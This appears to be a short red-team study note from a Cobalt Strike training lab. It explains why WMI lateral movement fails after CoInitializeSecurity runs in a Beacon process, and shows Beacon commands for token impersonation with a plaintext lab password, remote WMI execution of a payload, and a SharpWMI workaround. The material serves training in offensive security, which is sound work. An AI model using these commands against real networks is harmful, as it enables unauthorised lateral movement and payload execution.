Secondary Categories: 02 - Lateral Movement02 - Persistence02 - Privilege Escalation Links: Beacon Object Files Component Object Model (COM) Search Tag:π
CoInitializeSecurity
Description:
Cobalt Strike
Beaconβs internal implementation of WMI uses a Beacon Object File, executed using the beacon_inline___execute Aggressor function. When a BOF is executed the CoInitializeSecurity COM object can be called, which is used to set the security context for the current process. According to Microsoftβs documentation, this can only be called once per process.Β The unfortunate consequence is that if you have CoInitializeSecurity get called in the context of, say βUser Aβ, then future BOFs may not be able to inherit a different security context (βUser Bβ) for the lifetime of the Beacon process.
An example of that can look like the following:
beacon> make_token DEV\jking Qwerty123
[+] Impersonated DEV\bfarmer
beacon> remote-exec wmi web.dev.cyberbotic.io C:\Windows\smb_x64.exe
CoInitializeSecurity already called. Thread token (if there is one) may not get used
[-] Could not connect to web.dev.cyberbotic.io: 5We know jking is a local admin on WEB but because CoInitializeSecurity has already been called (probably in the context of bfarmer), WMI fails with access denied. Β As a workaround, your WMI execution needs to come from a different process. This can be achieved with commands such as spawn and spawnas, or even execute-assembly with a tool such as SharpWMI.
beacon> execute-assembly C:\Tools\SharpWMI\SharpWMI\bin\Release\SharpWMI.exe action=exec computername=web.dev.cyberbotic.io command="C:\Windows\smb_x64.exe"
[*] Host Β Β Β Β Β Β Β Β Β Β Β Β Β : web.dev.cyberbotic.io
[*] Command Β Β Β Β Β Β Β Β Β Β Β Β : C:\Windows\smb_x64.exe
[*] Creation of process returned Β : 0
[*] Process ID Β Β Β Β Β Β Β Β Β Β : 3436Resources:
| Title | URL |
|---|---|
| place | holder |
Created Date: November 17th 2022 23:19
Last Modified Date: November 17th 2022 23:19